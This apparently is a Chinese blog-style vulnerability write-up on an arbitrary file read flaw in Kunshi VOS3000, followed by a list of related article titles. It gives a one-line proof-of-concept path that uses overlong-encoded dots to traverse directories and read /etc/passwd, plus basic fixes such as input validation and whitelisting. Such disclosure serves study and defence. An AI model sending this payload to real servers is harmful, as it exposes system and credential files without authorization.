漏洞描述:

昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞。

漏洞利用条件:

对⽤户查看或下载的⽂件没有限制或者限制绕过,就可以查看或下载任意⽂件

漏洞影响范围:

VOS3000

漏洞复现:

1.Poc:/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

修复建议:

1、对用户输入的参数进行校验;
2、限定用户访问的文件范围;
3、使用白名单;
4、过滤…/,防止用户进行目录遍历;
5、文件映射,存储和应用分离。

学习记录过程仅供参考!!!!

昆石网络 VOS3000虚拟运营支撑系统任意文件读取漏洞相关推荐

  1. 【MetInfo任意文件读取】--任意文件读取漏洞

    文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...

  2. 任意文件读取漏洞知识梳理

    文章目录 1.概述 2.开发语言触发点 2.1 PHP 2.2 Python 2.3 Java 2.4 Ruby 2.5 Node 3.中间件/服务器相关触发点 3.1 Nginx错误配置 3.2 数 ...

  3. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

  4. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  5. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  6. 一米OA任意文件读取漏洞

    漏洞描述 一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞 漏洞影响 一米OA 网络测绘 app="一米OA" 漏洞复现 出现漏洞的文件 <%@

  7. 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞

    文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...

  8. CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

    漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...

  9. 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

    漏洞描述 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 漏洞影响 用友 畅捷通T+ 网络测绘 app="畅捷通-T ...

最新文章

  1. Spring Boot 整合Redis 实现缓存
  2. ds图—最小生成树_Java: Kruskal算法生成最小生成树(邻接矩阵)
  3. YUV视频格式到RGB32格式转换的速度优化 上篇(转)
  4. elasticsearch term match multi_match区别
  5. python.freelycode.com-Python数据可视化2018:为什么这么多的库?
  6. python matplotlib散点图-python matplotlib更新函数的散点图
  7. java应用程序中判断用户输入的一个整数是否在已知数组里。
  8. 2017西安交大ACM小学期数据结构 [树状数组 离散化]
  9. Andrew Ng机器学习之一 导论
  10. 使用设备mac好还是随机mac好_省4000我给MBP16搭配了一块2T SSD:希捷 酷鱼飞翼 Fast SSD使用测评...
  11. ReportViewer教程(4)-为报表打造数据源
  12. python基础(2)
  13. GDI+中的图片处理类Image或Bitmap
  14. VMWare Fusion虚拟机安装与配置教程
  15. 智慧城市顶层设计跨界思维指导方案(ppt)
  16. 帝国cms7.2自定义列表建立tag效果 代码 教程
  17. 杰理之ifi_camera跑sfc的启动时间【篇】
  18. 量产软件测试培训,东芝U盘量产教程-提供黑灰色版量产工具及检测软件
  19. 恢复微信撤回的图片(不容root,极其简单)
  20. dede后台登陆后一片空白的解决办法汇总

热门文章

  1. Mybatis---多表联合查询(1)
  2. amis 视频教程 入门+实战 百度出的前端低代码框架
  3. NVIDIA Tesla GPU系列P4、T4、P40以及V100显卡性能的对比
  4. 【深度学习】 为Tesla K40c(显卡算力小于3.5)安装pytorch(要求显卡算力3.7以上)笔记
  5. HRNet人体关键点检测
  6. 不等号属于不等式吗_什么是不等式
  7. 菜孔孔学python--集合
  8. [笔记]Class.forName 时static代码的运行
  9. 画春天的景色计算机教案,【美丽的春天图画】美丽的春天幼儿园春季教案
  10. 有了它,Python“咸鱼”迅速翻身!